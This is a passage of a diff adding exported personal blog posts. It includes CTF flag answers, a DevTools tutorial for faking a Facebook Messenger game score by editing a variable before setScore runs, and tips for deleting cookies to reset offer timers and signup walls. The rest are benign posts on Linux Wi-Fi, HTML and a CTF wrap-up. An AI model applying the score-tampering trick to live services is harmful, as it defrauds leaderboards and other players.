class="graf graf--pre graf-after--p graf--trailing">Cote dIvoire: h4ck1t{arpanet}<br>Bolivia: h4ck1t{Tim}<br>Colombia: h4ck1t{heartbleed}<br>Costa Rica: h4ck1t{7}<br>Ecuador: h4ck1t{archie}<br>Finland: h4ck1t{mitnick}<br>Greece: h4ck1t{30}<br>Honduras: h4ck1t{Binary}<br>Italy: h4ck1t{2015}<br>Kazakhstan: h4ck1t{polymorphic}<br>Kyrgyzstan: h4ck1t{smtp}<br>Madagascar: h4ck1t{caesar}<br>Nicaragua: h4ck1t{B@S3_S0_B@S3_}<br>Nigeria: h4ck1t{128}<br>Peru: h4ck1t{Decimal}<br>Phillipines: h4ck1t{creeper}<br>Spain: h4ck1t{social engineering}<br>Venezuela: h4ck1t{admin123}</pre>
</div>
</div>
</section>
</section>
<footer>
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
href="https://medium.com/p/8caf20e4b185"><time class="dt-published"
datetime="2016-10-02T20:46:42.000Z">October 2, 2016</time></a>.</p>
<p><a href="https://medium.com/@failedxyz/h4ck1t-ctf-2016-8caf20e4b185" class="p-canonical">Canonical link</a></p>
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
</footer>
</article>

131
src/content/posts/2016-12-01_Lightning-Speed-Run.md Normal file
View file

@ -0,0 +1,131 @@
---
title: Lightning Speed Run
date: 2016-12-01T22:26:36.000Z
tags: [medium-blog]
---
<article class="h-entry">
<section data-field="body" class="e-content">
<section name="6b11" class="section section--body section--first section--last">
<div class="section-content">
<div class="section-inner sectionLayout--insetColumn">
<p name="a5c4" id="a5c4" class="graf graf--p graf-after--h3">Recently, a new little icon appeared in the
text box on Messenger next to the camera icon and payments:</p>
<figure name="a818" id="a818" class="graf graf--figure graf-after--p"><img class="graf-image"
data-image-id="0*pGW634t0gBRppaDV.png" data-width="417" data-height="165"
src="https://cdn-images-1.medium.com/max/800/0*pGW634t0gBRppaDV.png">
<figcaption class="imageCaption">The games icon.</figcaption>
</figure>
<p name="c25c" id="c25c" class="graf graf--p graf-after--figure">If you click it, a menu shows up and you
can play a number of in-browser games. It seems that the games are run without any plugins, so they use
HTML5 to run and interact with Facebooks API, such as setting scores on the leaderboard and whatnot.</p>
<p name="f0a0" id="f0a0" class="graf graf--p graf-after--p">In this post, Ill look at the game <strong
class="markup--strong markup--p-strong">TRACK &amp; FIELD 100M</strong>. The object of this game is to
press the left-foot button and the right-foot button as quickly as possible. Since your final score is the
elapsed time, lower scores will outrank higher scores. I will explain how to achieve a score of 0:00.01.
</p>
<h3 name="5a38" id="5a38" class="graf graf--h3 graf-after--p">Step 1: Finding the Source Files</h3>
<p name="5644" id="5644" class="graf graf--p graf-after--h3">It turns out that when Messenger loads the
source files for the game (which are *.js files) when you first open the game. This makes it easy to
figure out which source files are responsible for the actual game logic. In this tutorial, Ill be using
Chrome, but Ive confirmed that it works on Microsoft Edge as well.</p>
<p name="7b9c" id="7b9c" class="graf graf--p graf-after--p">First, open Developer Tools using Ctrl+Shift+I
or F12, and go to the Network tab. There might be a few resources loaded already; delete them with the 🛇
button. Since we are looking for JavaScript files, open the filter view and select JS.</p>
<p name="dcc3" id="dcc3" class="graf graf--p graf-after--p">Now, when Facebook loads the JavaScript source
files, they will appear in this view. Open the game menu and press the Play button next to the game TRACK
&amp; FIELD 100M. Once you have done this, a few files will start to appear.</p>
<figure name="8807" id="8807" class="graf graf--figure graf-after--p"><img class="graf-image"
data-image-id="0*_aZtMhKZDxW0im1t.png" data-width="676" data-height="275"
src="https://cdn-images-1.medium.com/max/800/0*_aZtMhKZDxW0im1t.png">
<figcaption class="imageCaption">Network tab in Chrome Developer Tools.</figcaption>
</figure>
<p name="07f6" id="07f6" class="graf graf--p graf-after--figure">main.js looks like a pretty good place to
start. Look at the URL: <code
class="markup--code markup--p-code">https://apps-1665884840370147.apps.fbsbx.com/instant-bundle/1230433990363006/1064870650278605/main.js</code>.
Since this resource has already been loaded into the browser, we can find it under the Sources tab of
Developer Tools. Trace the path, starting from the domain like this:</p>
<figure name="360f" id="360f" class="graf graf--figure graf-after--p"><img class="graf-image"
data-image-id="0*Dcb_QsTKJFFrq2lg.png" data-width="676" data-height="529"
src="https://cdn-images-1.medium.com/max/800/0*Dcb_QsTKJFFrq2lg.png">
<figcaption class="imageCaption">Finding the source code.</figcaption>
</figure>
<h3 name="e060" id="e060" class="graf graf--h3 graf-after--figure">Step 2: Analyzing main.js</h3>
<p name="df9f" id="df9f" class="graf graf--p graf-after--h3">Go ahead an pretty-print the minified file,
just like it suggests. (for those of you who didnt get that notification, just hit the {} button next to
Line/Column. Since this file isnt obfuscated, its fairly easy to just look through the file and figure
out what it does.</p>
<p name="147a" id="147a" class="graf graf--p graf-after--p">I dont really know how to explain this part
well; if youre familiar with code, you should be able to traverse the file pretty easily. I eventually
arrived at this function:</p>
<pre name="65f2" id="65f2"
class="graf graf--pre graf-after--p">GameScene.prototype.stepEnd_ = function() {<br> if (this.isStepTimeOver_(2e3)) {<br> var e = Math.floor(1e3 * this.timeSpeed_.getTime());<br> FBInstant.setScore(e),<br> FBInstant.takeScreenshot(),<br> this.stepFunc_ = this.stepEnd2_,<br> this.audience_.fadeTo(.5)<br> }<br>}</pre>
<p name="ff9d" id="ff9d" class="graf graf--p graf-after--pre"><code
class="markup--code markup--p-code">stepEnd_</code> is the handler for the event where the user finishes
the game. As you can see, it computes the elapsed the time, and multiplies it by 1,000 (probably because
Facebook stores these scores as integers). This is sent to Facebook using the <code
class="markup--code markup--p-code">FBInstant</code> librarys <code
class="markup--code markup--p-code">setScore</code> function. After looking at a couple of these games,
youll notice that <code class="markup--code markup--p-code">FBInstant</code> is pretty much universal
among these games, since its required to interact with the Facebook API.</p>
<h3 name="25ef" id="25ef" class="graf graf--h3 graf-after--p">Step 3: The Exploit</h3>
<p name="ed05" id="ed05" class="graf graf--p graf-after--h3">The strategy to exploit this is to add a
breakpoint at that line, so code execution is paused before that line is executed. Then we are free to
change the variable to whatever wed like to change it to, and then resume execution so that our changed
value is sent to the server.</p>
<p name="4095" id="4095" class="graf graf--p graf-after--p">Id like to point out that setting the variable
to non-numerical types will simply cause the upload to fail. Im guessing theyre doing some type-checking
on it server-side. That doesnt prevent us from simply changing the value to 0 and sending it to the
server.</p>
<p name="bf3b" id="bf3b" class="graf graf--p graf-after--p">To add a breakpoint to that line, click the line
number where the line <code class="markup--code markup--p-code">FBInstant.setScore(e)</code> appears. The
blue arrow indicates that a breakpoint has been set, and code execution will stop before this line starts.
</p>
<figure name="8c89" id="8c89" class="graf graf--figure graf-after--p"><img class="graf-image"
data-image-id="0*pFhcPeUtuQ3H74Qd.png" data-width="427" data-height="151"
src="https://cdn-images-1.medium.com/max/800/0*pFhcPeUtuQ3H74Qd.png">
<figcaption class="imageCaption">Adding a breakpoint in the code.</figcaption>
</figure>
<p name="4780" id="4780" class="graf graf--p graf-after--figure">Now, start the game and play through it
like normal. It doesnt matter what score you get, as long as you finish and trigger the <code
class="markup--code markup--p-code">stepEnd_</code> function, the code will stop and wait for you before
submitting your score.</p>
<p name="d32b" id="d32b" class="graf graf--p graf-after--p">If you are still on the Sources tab, youll be
able to see the variables in the scope of the deepest function we are in when the code stops.</p>
<figure name="8f1b" id="8f1b" class="graf graf--figure graf-after--p"><img class="graf-image"
data-image-id="0*YZn_TJFtZ8NSNpne.png" data-width="679" data-height="521"
src="https://cdn-images-1.medium.com/max/800/0*YZn_TJFtZ8NSNpne.png">
<figcaption class="imageCaption">Local variables at the point where we added the breakpoint.</figcaption>
</figure>
<p name="23ff" id="23ff" class="graf graf--p graf-after--figure">Open the Console (either by navigating to
the Console tab, or just pressing Esc to open it within the Sources tab), and just type</p>
<pre name="135a" id="135a" class="graf graf--pre graf-after--p">e = 1</pre>
<p name="b024" id="b024" class="graf graf--p graf-after--pre">We just changed the value of the local
variable <code class="markup--code markup--p-code">e</code> to 1 (1 millisecond; for some reason it bugs
when I use <code class="markup--code markup--p-code">e = 0</code>). When the execution continues, it will
use our changed value, and submit that to the score server. Exit the game, and you should see that score
reflected on the leaderboard.</p>
<h3 name="d338" id="d338" class="graf graf--h3 graf-after--p">Recap</h3>
<p name="4285" id="4285" class="graf graf--p graf-after--h3">When you are developing browser-based games,
you can never trust user input. As long as the user has control, he can jack the browser logic and change
variables during runtime. Ideally, the game logic should be done server-side, and the client is simply a
terminal passing inputs to the server and visuals back to the client.</p>
<p name="2d42" id="2d42" class="graf graf--p graf-after--p">However, this is highly impractical. If you sent
a request for every input and waited for the server to respond, youd get a huge delay, even for very fast
connections. This is one of the hardest problems to tackle in real-time RPGs: how can we verify that the
user is moving as they should, while still running the game as fast as we can?</p>
<p name="90a9" id="90a9" class="graf graf--p graf-after--p graf--trailing">Thats all I have today. Thanks
for reading!</p>
</div>
</div>
</section>
</section>
<footer>
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
href="https://medium.com/p/eb9637dc5b1c"><time class="dt-published"
datetime="2016-12-01T22:26:36.000Z">December 1, 2016</time></a>.</p>
<p><a href="https://medium.com/@failedxyz/lightning-speed-run-eb9637dc5b1c" class="p-canonical">Canonical link</a>
</p>
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
</footer>
</article>

32
src/content/posts/2016-12-30_XinIRC-development.md Normal file
View file

@ -0,0 +1,32 @@
---
title: XinIRC development
date: 2016-12-30T05:19:21.000Z
tags: [medium-blog]
---
<article class="h-entry">
<section data-field="body" class="e-content">
<section name="a4a4" class="section section--body section--first section--last">
<div class="section-content">
<div class="section-inner sectionLayout--insetColumn">
<p name="7483" id="7483" class="graf graf--p graf-after--h3">Today, I marked the <a
href="https://github.com/failedxyz/xinircd/releases/tag/v0.1a"
data-href="https://github.com/failedxyz/xinircd/releases/tag/v0.1a"
class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">initial release</a> of XinIRCd,
an IRC server that I just started working on recently. As of now, its still heavily inspired by InspIRCd,
from its configuration wizard to its command handling, but Ill start adding more features soon.</p>
<p name="0b8e" id="0b8e" class="graf graf--p graf-after--p graf--trailing">Ive still got a couple weeks
left of break, so Ill try to get as much done in that time as possible.</p>
</div>
</div>
</section>
</section>
<footer>
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
href="https://medium.com/p/6e7dfe8bce05"><time class="dt-published" datetime="2016-12-30T05:19:21.000Z">December
30, 2016</time></a>.</p>
<p><a href="https://medium.com/@failedxyz/xinirc-development-6e7dfe8bce05" class="p-canonical">Canonical link</a>
</p>
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
</footer>
</article>

51
src/content/posts/2017-01-03_Wi-Fi-Problems-when-Installing-Linux-on-ASUS-machines.md Normal file
View file

@ -0,0 +1,51 @@
---
title: Wi-Fi Problems when Installing Linux on ASUS machines
date: 2017-01-03T22:58:06.000Z
tags: [medium-blog]
---
<article class="h-entry">
<section data-field="body" class="e-content">
<section name="0ff7" class="section section--body section--first section--last">
<div class="section-content">
<div class="section-inner sectionLayout--insetColumn">
<p name="3a83" id="3a83" class="graf graf--p graf-after--h3">Recently, Ive been exploring installing
various Linux distributions over my Windows installation. The main reason for doing this would be not
having to pull up a virtual machine every time I wanted to do anything.</p>
<p name="3a29" id="3a29" class="graf graf--p graf-after--p">But with both Arch Linux and Ubuntu, I kept
running into the same problem: I couldnt connect to Wi-Fi. I poked around, and it said that my network
switch (the hardware one) was switched off. No matter what I tried to do with <code
class="markup--code markup--p-code">rfkill</code>, I couldnt get the physical switch back on.</p>
<p name="43b7" id="43b7" class="graf graf--p graf-after--p">My ASUS computer doesnt have a network switch.
Theres an airplane mode button, but that didnt really do anything either. I eventually found the
solution in <a href="https://ubuntuforums.org/showthread.php?t=2181558"
data-href="https://ubuntuforums.org/showthread.php?t=2181558" class="markup--anchor markup--p-anchor"
rel="noopener" target="_blank">this thread</a>, but Ill repeat it here.</p>
<pre name="32a3" id="32a3"
class="graf graf--pre graf-after--p">echo &quot;options asus_nb_wmi wapf=4&quot; | sudo tee /etc/modprobe.d/asus_nb_wmi.conf</pre>
<p name="203e" id="203e" class="graf graf--p graf-after--pre">..or simply put that line in that file. <code
class="markup--code markup--p-code">asus_nb_wmi</code> is the driver for the Wi-Fi module. What does
<code class="markup--code markup--p-code">wapf=4</code> do? Well, according to <a
href="https://github.com/rufferson/ashs" data-href="https://github.com/rufferson/ashs"
class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">this</a>,
</p>
<blockquote name="9624" id="9624" class="graf graf--blockquote graf-after--p">When WAPF = 4driver sends
ACPI scancode 0x88 which is converted by asus-wmi to RFKILL key, which is processed by all registerd
rfkill drivers to toggle their state.</blockquote>
<p name="6456" id="6456" class="graf graf--p graf-after--blockquote">Essentially, it is making <code
class="markup--code markup--p-code">rfkill</code> recognize that the hardware switch is not off, so the
Wi-Fi works again.</p>
<p name="ca42" id="ca42" class="graf graf--p graf-after--p graf--trailing">Thanks for reading!</p>
</div>
</div>
</section>
</section>
<footer>
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
href="https://medium.com/p/75be2b8b7cc3"><time class="dt-published" datetime="2017-01-03T22:58:06.000Z">January
3, 2017</time></a>.</p>
<p><a href="https://medium.com/@failedxyz/wi-fi-problems-when-installing-linux-on-asus-machines-75be2b8b7cc3"
class="p-canonical">Canonical link</a></p>
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
</footer>
</article>

63
src/content/posts/2017-01-07_Watch-out--returning-users.md Normal file
View file

@ -0,0 +1,63 @@
---
title: Watch out, returning users!
date: 2017-01-07T02:58:17.000Z
tags: [medium-blog]
---
<article class="h-entry">
<section data-field="body" class="e-content">
<section name="0a81" class="section section--body section--first section--last">
<div class="section-content">
<div class="section-inner sectionLayout--insetColumn">
<p name="2c44" id="2c44" class="graf graf--p graf-after--h3">A lot of websites put <strong
class="markup--strong markup--p-strong">cookies</strong> on your computer in order to save information
about your previous visits to the site. The most common use case would be storing a key that would allow
your computer to auto-login to the site the next time you visited it (rather than forcing you to
re-login).</p>
<p name="a1d8" id="a1d8" class="graf graf--p graf-after--p">Many sites also put cookies on your computer to
figure out if youve visited the site before, and may change behavior based on whether youre a new user,
or youre a returning user.</p>
<p name="a6fd" id="a6fd" class="graf graf--p graf-after--p">For example, take a look at <a
href="https://www.livingsocial.com/deals/1630304-pokemon-go-course"
data-href="https://www.livingsocial.com/deals/1630304-pokemon-go-course"
class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">this website</a>. Lets ignore
the product that its advertising for now and just focus on the “Limited Time Savings” offer on the right
side. Isnt it strange how the timer started at 5:00 exactly? In other words, either you were incredibly
lucky to have visited the site <em class="markup--em markup--p-em">exactly</em> 5 minutes before the offer
ended, or theres some other trick theyre pulling.</p>
<p name="1b3d" id="1b3d" class="graf graf--p graf-after--p">It turns out that one of the cookies (I havent
looked into it enough, but if you poke around, you should be able to find it) they store <strong
class="markup--strong markup--p-strong">on your machine</strong> determines when this limited time offer
either started or expires. What it means is that the first time you visit the site, the cookie is created
and you have 5 minutes from that moment to do this purchase. Afterwards, the cookie still exists on your
computer, so it wont offer you the deal anymore.</p>
<p name="49b9" id="49b9" class="graf graf--p graf-after--p">But this means that if you get rid of the
cookie, you can get the 5 minute deal back. If you get an extension such as <a
href="https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg"
data-href="https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg"
class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">EditThisCookie</a> thats able to
view and manipulate cookies, then you can have a lot better control of what websites are storing on your
computer.</p>
<p name="4afc" id="4afc" class="graf graf--p graf-after--p">Some other websites this trick works on include
<a href="https://www.linkedin.com/" data-href="https://www.linkedin.com/"
class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">LinkedIn</a> and <a
href="https://www.quora.com/" data-href="https://www.quora.com/" class="markup--anchor markup--p-anchor"
rel="noopener" target="_blank">Quora</a>, which ask you to create an account to view content after the
first time you visit their site. If you dont want to create an account, then simply delete any cookies
theyve stored on your computer and you will be able to access the site as if it was your first time.
</p>
<p name="3490" id="3490" class="graf graf--p graf-after--p graf--trailing">Thats all. Thanks for reading!
</p>
</div>
</div>
</section>
</section>
<footer>
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
href="https://medium.com/p/eccca70f4684"><time class="dt-published" datetime="2017-01-07T02:58:17.000Z">January
7, 2017</time></a>.</p>
<p><a href="https://medium.com/@failedxyz/watch-out-returning-users-eccca70f4684" class="p-canonical">Canonical
link</a></p>
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
</footer>
</article>

80
src/content/posts/2017-01-14_Why-I-think-HTML-is-a-programming-language.md Normal file
View file

@ -0,0 +1,80 @@
---
title: Why I think HTML is a programming language.
date: 2017-01-14T09:07:31.000Z
tags: [medium-blog]
---
<article class="h-entry">
<section data-field="body" class="e-content">
<section name="21e8" class="section section--body section--first section--last">
<div class="section-content">
<div class="section-inner sectionLayout--insetColumn">
<p name="94a6" id="94a6" class="graf graf--p graf-after--h3">Yep, Im one of those people. Go ahead and
judge me, but at least hear me out first.</p>
<p name="7407" id="7407" class="graf graf--p graf-after--p">Obviously, the first thing we have to do in
order to answer the “Is HTML a programming language?” question is to define what a programming language
is. Lets literally take the term apart:</p>
<ul class="postList">
<li name="ede6" id="ede6" class="graf graf--li graf-after--p"><strong
class="markup--strong markup--li-strong">programming</strong>: Its when you tell a computer what to
do. For example, I can program a bot to respond to messages while Im away. Or I can program my phone to
wake up at 7:30 in the morning. Its all the same.</li>
<li name="2b5d" id="2b5d" class="graf graf--li graf-after--li"><strong
class="markup--strong markup--li-strong">language</strong>: A standard method of communication that is
accepted by both the speaker and the receiver. Except in this context, its not with humans but a
machine, so youre not really speaking.</li>
</ul>
<p name="832d" id="832d" class="graf graf--p graf-after--li">Following those definitions, a programming
language must be a method of communicating to the computers what you want it to do. These are rather loose
definitions that I came up with, but if you dont agree with that, you can stop reading now.</p>
<p name="ecc9" id="ecc9" class="graf graf--p graf-after--p">The primary purpose of HTML is to serve as a
method to display webpage data that is received from the server into a visual representation into your
browser. Thats just a fancy way of saying “you tell the browser where to put stuff”. Lets check if that
satisfies the above points:</p>
<ul class="postList">
<li name="d874" id="d874" class="graf graf--li graf-after--p">Youre telling the computer how to display
elements!</li>
<li name="2ae6" id="2ae6" class="graf graf--li graf-after--li">Youre using a system of communication that
both you and the computer understand.</li>
</ul>
<p name="fafb" id="fafb" class="graf graf--p graf-after--li">If you dont agree that the above two
demonstrate that HTML satisfies the requirements for a programming language that I laid out above, then
Id love to hear your thoughts.</p>
<p name="fbd3" id="fbd3" class="graf graf--p graf-after--p">So why are people so insistent that HTML is not
a programming language? Well, heres some of the reasons Ive seen so far.</p>
<ul class="postList">
<li name="7225" id="7225" class="graf graf--li graf--startsWithDoubleQuote graf-after--p">“You cant
perform arithmetic operations with HTML.” You cant perform arithmetic operations with HTML because
thats not what it was made for. thats like trying to use a hammer to screw in a screw. Doesnt make it
any less of a tool.</li>
<li name="4e0d" id="4e0d" class="graf graf--li graf--startsWithDoubleQuote graf-after--li">“It cant
process data.” Refer to the first point about arithmetic operations.</li>
<li name="3e94" id="3e94" class="graf graf--li graf--startsWithDoubleQuote graf-after--li">“It doesnt
produce executable code.” Why not? Lets say I put this line into an HTML file: <code
class="markup--code markup--li-code">&lt;br /&gt;</code>. Is it not telling the browser to create a
line break? Isnt that making it execute an instruction? Sure, you can say that the HTML isnt actually
creating the element, its the browser engine. But by that logic, no programming language actually
exists other than the binary data that the machine is executing, since thats whats really executing
all our code. If you dont put the elements in, the browser wont do anything, so HTML is giving the
browser instructions on what to do.</li>
<li name="537f" id="537f" class="graf graf--li graf--startsWithDoubleQuote graf-after--li">“Its not
Turing-complete.” Where did the requirement that programming languages had to be Turing-complete come
in? Just because your hammer isnt a Swiss army knife that can do everything, doesnt make it any less
of a tool.</li>
</ul>
<p name="28c1" id="28c1" class="graf graf--p graf-after--li graf--trailing">At the end of the day, this is
all just still my opinion. If you dont agree, please voice your opinions and convince me otherwise
(preferably using well-informed arguments)!</p>
</div>
</div>
</section>
</section>
<footer>
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
href="https://medium.com/p/ccf34bd2758c"><time class="dt-published" datetime="2017-01-14T09:07:31.000Z">January
14, 2017</time></a>.</p>
<p><a href="https://medium.com/@failedxyz/why-i-think-html-is-a-programming-language-ccf34bd2758c"
class="p-canonical">Canonical link</a></p>
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
</footer>
</article>

33
src/content/posts/2017-02-16_So--you-can-detect-whether-I-use-an-ad-blocker-or-not--eh.md Normal file
View file

@ -0,0 +1,33 @@
---
title: So, you can detect whether I use an ad-blocker or not, eh?
date: 2017-02-16T03:07:43.893Z
tags: [medium-blog]
---
<article class="h-entry">
<section data-field="body" class="e-content">
<section name="fb3e" class="section section--body section--first section--last">
<div class="section-content">
<div class="section-inner sectionLayout--insetColumn">
<p name="3093" id="3093" class="graf graf--p graf-after--h3">Guess its one less site Im going to be
wasting my time on now.</p>
<p name="55ab" id="55ab" class="graf graf--p graf-after--p">I know its an important part of making revenue
or whatever, but from the users standpoint, ads should be <em
class="markup--em markup--p-em">non-intrusive</em>. That means I should be able to do whatever I want on
the site without needing to bother looking at your advertisements.</p>
<p name="14a3" id="14a3" class="graf graf--p graf-after--p graf--trailing">Dont push advertisements into my
face. Promote good content that people want to see, and theyll automatically come back for more. Because
to be honest, I dont really care about your site enough to turn off my ad-blocker for it.</p>
</div>
</div>
</section>
</section>
<footer>
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
href="https://medium.com/p/3856335f209c"><time class="dt-published" datetime="2017-02-16T03:07:43.893Z">February
16, 2017</time></a>.</p>
<p><a href="https://medium.com/@failedxyz/so-you-can-detect-whether-i-use-an-ad-blocker-or-not-eh-3856335f209c"
class="p-canonical">Canonical link</a></p>
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
</footer>
</article>

133
src/content/posts/2017-03-24_EasyCTF-2017-Wrap-up.md Normal file
View file

@ -0,0 +1,133 @@
---
title: EasyCTF 2017 Wrap-up
date: 2017-03-24T11:36:40.681Z
tags: [medium-blog]
---
<article class="h-entry">
<section data-field="body" class="e-content">
<section name="5ea1" class="section section--body section--first section--last">
<div class="section-content">
<div class="section-inner sectionLayout--insetColumn">
<p name="398b" id="398b" class="graf graf--p graf-after--h3">EasyCTF just concluded this Monday! Looking
back on the competition, Id say that this year was our best year ever. Lets take a look at some of the
stats.</p>
<ul class="postList">
<li name="2082" id="2082" class="graf graf--li graf-after--p"><strong
class="markup--strong markup--li-strong">5,837</strong> users registered this year, playing on <strong
class="markup--strong markup--li-strong">2,742</strong> teams. Of those teams, <strong
class="markup--strong markup--li-strong">1,938</strong> teams scored points.</li>
<li name="0fe5" id="0fe5" class="graf graf--li graf-after--li">We had <strong
class="markup--strong markup--li-strong">63</strong> challenges, which was close to our 68 last year.
</li>
<li name="1105" id="1105" class="graf graf--li graf-after--li"><strong
class="markup--strong markup--li-strong">10.7%</strong> of all teams had 5 membersfull teams! In
fact, there were more 5-member teams than there were 4-, 3-, and 2-member teams.</li>
</ul>
<p name="9393" id="9393" class="graf graf--p graf-after--li">Im really happy to see that so many people
were willing to give us a week of their time to participate in our event and work through our challenges,
despite the fact that we hadnt promised any prizes ahead of time.</p>
<p name="a95a" id="a95a" class="graf graf--p graf-after--p">Id also like to give a shout-out to the entire
dev team who helped monitor basically every point of contact that people had with us and creating amazing
challenges.</p>
<h3 name="17c6" id="17c6" class="graf graf--h3 graf-after--p">Improvements for next year</h3>
<p name="80aa" id="80aa" class="graf graf--p graf-after--h3">I still havent decided whether Ill be
completely involved in organizing this event again next year. I hope that Ill have some free time
alongside my classes, but Id also like some more cooperation from the rest of the organizers. The biggest
problem we had this year was basically not working on anything until the week before the competition. By
that time, it was already too late. Lets take a closer look at what actually went wrong:</p>
<ul class="postList">
<li name="09a8" id="09a8" class="graf graf--li graf-after--p"><strong
class="markup--strong markup--li-strong">Lack of motivation.</strong> Im not sure people were
actually busy during the entire year that we had planned to work, but there was definitely a lack of
work put into organizing the competition. We had some big ideas at the beginning of the year, but as
time passed, the chances of those ideas becoming reality looked rather slim as no one wanted to be the
first one to start working. Somewhere in there I threw in a couple of deadlines, and we got a couple of
problems written. Had I not done that, I fear we would have had much fewer problems than we actually
did.</li>
<li name="6dea" id="6dea" class="graf graf--li graf-after--li"><strong
class="markup--strong markup--li-strong">No contact with sponsor companies.</strong> Contacting
sponsors should have been one of the first things we did, since it takes a long time to sort out details
and companies usually take at least two weeks to reply to emails anyway. Towards the end, we did get an
email from DigitalOcean saying they were willing to fund servers for our competition, but launch day
came and we didnt hear back from them again.</li>
<li name="135a" id="135a" class="graf graf--li graf-after--li"><strong
class="markup--strong markup--li-strong">No coordination.</strong> Some of the feedback Ive been
hearing about this years competition is a shortage of actually “easy” problems. We never really went
through the competition and tried to lay out a “spectrum” of problems nor tackle it from the
participants perspective. Every problem was either just a “cool idea” someone had or “I feel like a CTF
needs this.” The intermediate web section was completely missing.</li>
<li name="f9eb" id="f9eb" class="graf graf--li graf-after--li"><strong
class="markup--strong markup--li-strong">Unbalanced team.</strong> Our team comprised mainly of
problem writers. Thats great and all, but when it comes to things like contacting sponsor companies,
writing the website, planning some kind of game, we basically have no resources to do those. I spent my
entire time developing OpenCTF, the platform that powered the competition, and I know for sure that was
a task too large for me to handle. Getting more web designers or people with other skills would have
helped out a lot.</li>
</ul>
<p name="e77f" id="e77f" class="graf graf--p graf-after--li">Ive also got a couple of points of reflection
for prospective CTF organizers, so if youre planning to run a CTF, this is for you.</p>
<ul class="postList">
<li name="f14f" id="f14f" class="graf graf--li graf-after--p"><strong
class="markup--strong markup--li-strong">Participant experience takes first priority.</strong> A lot
of organizers think the hardest part of running a CTF is getting good challenges. And theyd be right.
But thats not to say that preparing a solid game infrastructure for flag submission is going to be
something you can do last-minute. When it comes to the participants experience, the first thing that
they encounter is the website. Then a few initial challenges. Then probably the chat. Make sure you have
those down well and people will probably have a better initial impression of your CTF.</li>
<li name="f87b" id="f87b" class="graf graf--li graf-after--li"><strong
class="markup--strong markup--li-strong">Some people are there to make you miserable.</strong> As the
one in control, you need to account for those people. Were lucky that we only had relatively few
encounters with such people but do keep in mind that you are still running an event and that takes first
priority. During EasyCTF, there were a couple of people who thought it was funny to drop flags for hard
challenges into the chat room. When we tried to get them to stop, they would come back under different
aliases in order to annoy us. At that point we just shut down the entire chat room; the competition had
to go on.</li>
<li name="dd6b" id="dd6b" class="graf graf--li graf-after--li"><strong
class="markup--strong markup--li-strong">Ignore unconstructive negative feedback.</strong> Youre
always going to have haters. Dont take it to heart, solve the problems, and move on. Who cares if some
random kid in IRC says your CTF is garbage? Ask them what issues theyre having, fix them, and theyll
be happy. Its really not that complicated.</li>
<li name="2add" id="2add" class="graf graf--li graf-after--li"><strong
class="markup--strong markup--li-strong">Docker.</strong> Is probably a good idea. The learning curve
is not bad and its a great way to create disposable containers that can restart easily. Not only should
you use Docker for your main competition website, you should also use it for all of the challenges that
involve communicating with a server.</li>
</ul>
<p name="56ba" id="56ba" class="graf graf--p graf-after--li">Heres something else I definitely have to
share. We had this autogen system that created different flags for different teams in order to discourage
flag sharing. Some people came up to us reporting that their flag wasnt working, when they clearly just
took some other teams flag. I didnt really do anything about it, but just thought it was pretty funny
that they had the nerve to report it to us even though they were cheating.</p>
<p name="683f" id="683f" class="graf graf--p graf-after--p">So, whats the future for EasyCTF?</p>
<ul class="postList">
<li name="7263" id="7263" class="graf graf--li graf-after--p">Im seeing OpenCTF as a more permanent
solution to our main platform. Its a very complex piece of software and it would be insane to try to
rewrite it from scratch. Im in the process of creating an open-source version of it and making it
customizable (for example, turning off features that you dont need like the programming judge) for CTF
organizers.</li>
<li name="b2ec" id="b2ec" class="graf graf--li graf-after--li">We had this project going on a while back
for a CTF calendar that also hosted tasks. I was also hoping that it would be able to replay entire
competitions but that seems a bit too hopeful at this point. It would be nice to just get the calendar
revived.</li>
<li name="bc5e" id="bc5e" class="graf graf--li graf-after--li">WeebCTF is happening again this summer,
dates still yet to be decided. If youre into anime (or even if youre not), come check it out!</li>
<li name="ff8a" id="ff8a" class="graf graf--li graf-after--li">Applications for joining the organizing
team for the next EasyCTF will open soon. If there was something you didnt like about EasyCTF, and you
think you could have done better, by all means, join the team! Wed like to hear your ideas.</li>
</ul>
<p name="ef5b" id="ef5b" class="graf graf--p graf-after--li graf--trailing">Thanks for reading, and I hope
Ill be seeing you at the next CTF!</p>
</div>
</div>
</section>
</section>
<footer>
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
href="https://medium.com/p/4bbd1ca68877"><time class="dt-published" datetime="2017-03-24T11:36:40.681Z">March
24, 2017</time></a>.</p>
<p><a href="https://medium.com/@failedxyz/easyctf-2017-wrap-up-4bbd1ca68877" class="p-canonical">Canonical
link</a></p>
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
</footer>
</article>

94
src/content/posts/2017-03-26_VolgaCTF-2017-Writeups.md Normal file
View file

@ -0,0 +1,94 @@
---
title: VolgaCTF 2017 Writeups
date: 2017-03-26T21:52:31.553Z
tags: [medium-blog]
---
<article class="h-entry">
<section data-field="body" class="e-content">
<section name="0b53" class="section section--body section--first section--last">
<div class="section-content">
<div class="section-inner sectionLayout--insetColumn">
